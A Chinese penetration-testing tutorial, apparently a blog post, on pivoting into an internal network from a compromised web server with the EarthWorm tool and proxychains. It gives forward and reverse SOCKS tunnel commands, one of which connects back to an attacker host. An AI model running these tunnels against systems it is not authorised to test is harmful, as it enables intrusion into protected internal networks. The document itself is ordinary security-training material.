内网转发工具EW的使用


在渗透测试中,当我们获得了外网服务器(如web服务器,ftp服务器,mali服务器等等)的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段,一般情况下,内网中的其他机器是不允许外网机器访问的。这时候,我们可以通过 端口转发(隧道) 或将这台外网服务器设置成为 代理,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转发。

EW(EarthWorm)结合proxychains代理链

EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用,跨平台,任何平台都可以轻松使用!

在这里插入图片描述

现在有这么一个环境,我们获取到了位于公网Web服务器的权限,内网中存在另外一台主机,然后,我们现在要将公网Web服务器设置为代理,访问和探测内网主机的信息。
在这里插入图片描述

EW正向代理

web服务器设置
设置EW监听本地的1080端口
ew_for_Win.exe -s ssocksd -l 1080
在这里插入图片描述l

Linux主机设置
配置proxychains代理链的配置文件,将代理设置成 192.168.137.128的1080端口:socks5 192.168.137.128 1080
vim /etc/proxychains4.conf
在这里插入图片描述
然后在命令前加上proxychains就行,比如远程桌面连接内网中的主机192.168.52.143
proxychains rdesktop 192.168.52.143在这里插入图片描述

EW反向代理

web服务器设置
设置EW将本机的流量全部转发到192.168.137.129的8888端口
ew_for_Win.exe -s rssocks -d 192.168.137.129 -e 8888
在这里插入图片描述

Linux主机设置
设置ew将本机的8888端口的流量都转发给1080端口
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
在这里插入图片描述然后配置proxychains代理链的配置文件,将代理设置成 127.0.0.1的1080端口:socks5 127.0.0.1 1080
在这里插入图片描述
然后在命令前加上proxychains就行,比如远程桌面连接内网中的主机192.168.52.143
proxychains rdesktop 192.168.52.143
在这里插入图片描述
访问内网主机192.168.52.143上开启的web服务
proxychains curl http://192.168.52.143/yxcms/
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值